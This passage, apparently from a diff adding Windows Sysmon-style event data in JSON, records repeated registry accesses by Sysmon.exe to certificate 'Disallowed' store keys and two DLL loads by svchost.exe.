"registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AppXDeploymentClient.dll", + "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 